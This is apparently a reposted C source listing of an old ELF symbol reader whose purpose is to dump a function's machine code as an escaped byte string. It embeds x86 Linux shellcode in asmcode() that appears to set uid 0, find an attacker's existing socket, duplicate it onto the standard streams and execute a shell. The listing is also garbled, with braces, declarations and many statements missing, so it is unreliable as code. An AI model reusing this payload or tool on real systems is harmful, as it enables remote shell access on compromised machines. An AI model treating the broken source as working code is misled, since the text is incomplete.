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2013年10月03日 ⁄ 综合 ⁄ 共 11779字 ⁄ 字号 评论关闭

/* read elf string
 * by bkbll(bkbll#cnhonker.net) 2003-08-08
 * welcome to http://www.cnhonker.com

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <error.h>
#include <elf.h>

#define VER "1.10"

typedef struct
 char *info;
 int leng;
 int offset;

void asmcode()
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x17,%al
int $0x80
xorl %eax,%eax
pushl %eax
incl %eax
pushl %eax
movl %esp,%ebx
xorl %ecx,%ecx
movb $0xa2,%al
int $0x80
movb $0xe0,%cl
movl %ecx,%eax
subl $0x0a,%eax
notl %eax
incl %eax
movl %eax,%edi
xorl %eax,%eax
incl %eax
decl %esp
movl %esp,%edx
pushl %eax
pushl %eax
pushl %edx
pushl %edi
pushl %ecx
leal 4(%esp),%ecx
xorl %ebx,%ebx
movb $0x0a,%bl
movb $0x66,%al
int  $0x80   
popl %ecx
cmpl $0x01,%eax
jne  .+0x07
cmpb $0x49,(%edx)
je  .+0xb
loop .-0x2c
xorl %eax,%eax
incl %eax
movl %eax,%ebx
int  $0x80
movl %edi,%ebx
movb $0x03,%cl
movb $0x3f,%al
decl %ecx
int  $0x80
incl %ecx
loop .-0x06
pushl %ecx
pushl $0x68732f6e
pushl $0x69622f2f
movl  %esp,%ebx
pushl %ecx
pushl $0x706c692d
movl %esp,%edx
pushl %ecx
pushl %edx
pushl %ebx
movl %esp,%ecx
xorl %edx,%edx
xorl %eax,%eax
movb $0x0b,%al
int  $0x80          

void usage(char *s,int flag)
 printf("Elf file reader & asm code read/n");
 printf("by bkbll,bkbll@cnhonker.net(%s)/n",VER);
  printf("Usage:%s [-f <file>] [-x <address>] [-h]/n",s);
  printf("Options:/n/t-f: the file want to read(defaut is self)/n");
  printf("/t-x: the function address/n");
  printf("/t-h: this screen/n");
  printf("if nothing,it will show self's function table/n");

void ptelfhdr(Elf32_Ehdr *elfhdr)
 printf("[+] Program Entry Addr:%p/n",elfhdr->e_entry);
 //printf("[+] Program header table file offset:0x%x/n",elfhdr->e_phoff);  /* Program header table file offset */
  //printf("[+] Section header table file offset:0x%x/n",elfhdr->e_shoff);  /* Section header table file offset */
   //printf("[+] ELF header size in bytes:0x%x/n",elfhdr->e_ehsize);  /* ELF header size in bytes */
  //printf("[+] Program header table entry size:0x%x/n",elfhdr->e_phentsize);  /* Program header table entry size */
  //printf("[+] Program header table entry count:0x%x/n",elfhdr->e_phnum);  /* Program header table entry count */
   //printf("[+] Section header table entry size:0x%x/n",elfhdr->e_shentsize);  /* Section header table entry size */
  //printf("[+] Section header table entry count:0x%x/n",elfhdr->e_shnum);  /* Section header table entry count */
  //printf("[+] Section header string table index:0x%x/n",elfhdr->e_shstrndx);  /* Section header string table index */

void ptelfshd(Elf32_Shdr* shdr)
 //printf("[+] Section name (string tbl index):0x%x/n",shdr->sh_name); /* Section name (string tbl index) */
    //printf("[+] Section type:0x%x/n",shdr->sh_type);  /* Section type */
    //printf("[+] Section flags:0x%x/n",shdr->sh_flags);  /* Section flags */
    //printf("[+] Section virtual addr at execution:0x%x/n",shdr->sh_addr);  /* Section virtual addr at execution */
    //printf("[+] Section file offset:0x%x/n",shdr->sh_offset);  /* Section file offset */
    //printf("[+] Section size in bytes:0x%x/n",shdr->sh_size);  /* Section size in bytes */
    //printf("[+] Link to another section:0x%x/n",shdr->sh_link);  /* Link to another section */
    //printf("[+] Additional section information:0x%x/n",shdr->sh_info);  /* Additional section information */
    //printf("[+] Section alignment:0x%x/n",shdr->sh_addralign);  /* Section alignment */
    //printf("[+] Entry size if section holds table:0x%x/n",shdr->sh_entsize);  /* Entry size if section holds table */
int showmem(unsigned int p,int length)
        int i=0,t,a,ptleng;
        char *sc=(char *)p;
        int next=16;
                        printf("/r/n%p: ",sc+i);
               for(;i<next;i++)  printf("%.2x ",sc[i] & 0xff);
               for(;a<16;a++)  printf("   ");
               printf(" ");
                 if((*(sc+t)<0x1f) || (*(sc+t)>0x7e))
      return i;

void* readfile(FILE *fd,int offset,int size)
 void *buf;
  perror("[-] not a FILE pointer");
  return NULL;
  perror("[-] malloc failed");
  return NULL;
 //printf("[@] before fseek,position:%#x/n",ftell(fd));
  perror("[-] fseek failed");
  return NULL;
 //printf("[@] after fseek,position:%#x/n",ftell(fd));
  perror("[-] read failed");
  return NULL;
 return buf;
//get base address
unsigned int getbaseaddr(FILE *fd,Elf32_Ehdr *elfhdr)
 unsigned int i,phdsize,phdnum,phdoffset,baseaddr;
 char *buf;
 Elf32_Phdr *tmp_phd;

  tmp_phd=(Elf32_Phdr *)readfile(fd,phdoffset+i*phdsize,sizeof(Elf32_Phdr));
  if((tmp_phd->p_type) == PT_PHDR)
   return baseaddr;
 return 0;
int list_sym(FILE *fd,Elf32_Shdr *sym_shdr,Elf32_Shdr *sym_str_shdr)
 int i,a,num,stoff;
 int symbol_offset,symbol_allsize,sym_str_offset,sym_str_size;
 char *sym_str_table;
 Elf32_Sym *symbol1;
 if((sym_shdr == NULL ) || (sym_str_shdr == NULL))
  printf("[-] Not a Shdr pointer/n");
 printf("[+] Found %d symbols/n",num);
  printf("[-] No symbol here/n");
 printf("[@] Read 0x%x bytes from offset 0x%x/n",sym_str_size,sym_str_offset);
 sym_str_table=(char *)readfile(fd,sym_str_offset,sym_str_size);
 printf("[!] number  address  length  type   name /n");
  symbol1=(Elf32_Sym *)readfile(fd,symbol_offset+i*sizeof(Elf32_Sym),sizeof(Elf32_Sym));
  if((stoff>0) && (ELF32_ST_TYPE(symbol1->st_info)==STT_FUNC) && (symbol1->st_shndx!=SHN_UNDEF) && (symbol1->st_size>0))
   printf("[+] %3.d:  0x%.8x 0x%.4x  FUNC  %s/n",a,symbol1->st_value,symbol1->st_size,sym_str_table+stoff);
syminfo *find_symbol_byaddr(FILE *fd,unsigned int addr,Elf32_Shdr *sym_shdr,Elf32_Shdr *sym_str_shdr,unsigned int baseaddr)
 int i,a,num,staddr;
 int symbol_offset,symbol_allsize,sym_str_offset,sym_str_size;
 char *sym_str_table;
 Elf32_Sym *symbol1;
 syminfo *findout;
 if((sym_shdr == NULL ) || (sym_str_shdr == NULL))
  printf("[-] Not a Shdr pointer/n");
 //printf("[+] Found %d symbols/n",num);
  printf("[-] No symbol here/n");
 //printf("[@] 从0x%x处读0x%x字节内容/n",sym_str_offset,sym_str_size);
 sym_str_table=(char *)readfile(fd,sym_str_offset,sym_str_size);
 //printf("[!] number  address  length  name /n");
 findout=(syminfo *)malloc(sizeof(syminfo));
  symbol1=(Elf32_Sym *)readfile(fd,symbol_offset+i*sizeof(Elf32_Sym),sizeof(Elf32_Sym));
  //printf("/n[@] st_name:%d,symbol name:%s",symbol1->st_name,sym_str_table+symbol1->st_name);
  if((staddr==addr) && (symbol1->st_name>0))
   return findout;
 return NULL;

Elf32_Shdr *find_section_byname(FILE *fd,char *section_name,char *sstrtable,int s_offset,int snum,int ssize)
//文件名,查找的section名字,已经读出来的section string table,section入口地址,section有多少个,section多大
 int i,name_off;
 Elf32_Shdr *shdr1;
  shdr1=(Elf32_Shdr *)readfile(fd,s_offset+i*ssize,sizeof(*shdr1));
  if(shdr1==NULL) continue;
  //printf("[@] Finding str:%s, current str:%s/n",section_name,sstrtable+name_off);
   return shdr1;
 return NULL;

void prt_machine_code(FILE *fd,int offset,int length)
 char *buffer;
 int i,a;
 buffer=(char *)malloc(length);
  printf("[-] malloc memory error");
 buffer=(char *)readfile(fd,offset,length);
 printf("[+] machine code:/n/n");
  if((a%8==0) && (a/8>0)) printf("/"/n/"");
  printf("//x%.2x",buffer[i] & 0xff);

char symtabstr[]=".symtab";
char strtabstr[]=".strtab";
char selfexe[]="/proc/self/exe";
main(int argc,char **argv)
 Elf32_Ehdr *elfhdr;
 Elf32_Shdr *shdr,*sym_shdr,*sym_str_shdr;
 syminfo *find_out_sym;
 int i,str_sec_offset; //section string table在第几个section中
 int section_size,section_offset; //section开始位置,每个section大小
 int num,section_strtable_length,section_strtable_offset;
 unsigned int baseaddr;
 char *section_strtable,*filename;
 int address=0;
 char c;
 while((c = getopt(argc, argv, "f:x:h"))!= EOF)
       switch (c)
       case 'f':
       case 'x':
       case 'h':
            return 0;
  printf("Usage:%s <file> <addr>/n",argv[0]);
 //if(argc>1) filename=argv[1];
 //if(argc>2) sscanf(argv[2],"%x",&address);
 printf("[+] Reading file %s/n",filename);
  perror("[-] open file error");
 elfhdr=(Elf32_Ehdr *)readfile(fp,0,sizeof(*elfhdr));
 if(elfhdr==NULL) exit(0);
  printf("[-] Canot get base address/n");
 printf("[+] Found base address:%p/n",baseaddr);
 str_sec_offset=elfhdr->e_shstrndx; //SHD str table在section中的位置
 section_size=elfhdr->e_shentsize;  //每个section的大小
 section_offset=elfhdr->e_shoff;    //section入口地址
 num=elfhdr->e_shnum;               //一共多少个section
 //if(offset>0) str_sec_offset=offset;
  printf("[-] TOO large offset/n");
 shdr=(Elf32_Shdr *)readfile(fp,section_offset+str_sec_offset*section_size,section_size);
 //printf("[*] Section %d:/n",str_sec_offset);

 section_strtable_length=shdr->sh_size;    //section string table长度
 section_strtable_offset=shdr->sh_offset;  //section string table偏移量
 printf("[@] Read 0x%x bytes from offset 0x%x /n",section_strtable_length,section_strtable_offset);
 section_strtable=(char *)readfile(fp,section_strtable_offset,section_strtable_length);
 printf("[?] finding section %s......",symtabstr);
  printf("Got it/n");
 printf("[?] finding section %s......",strtabstr);
 if(sym_str_shdr==NULL)  printf("FAILED/n");
  printf("Got it/n");
  printf("[?] finding sym-addr:%p......",address);
   printf("Got it/n");
   printf("[+] Symbol name:%s/n",find_out_sym->info);
   printf("[+] Symbol offset:0x%x/n",find_out_sym->offset);
   printf("[+] Symbol leng:0x%x/n",find_out_sym->leng);
   //get the asm code
    printf("[-] Symbol length==0/n");
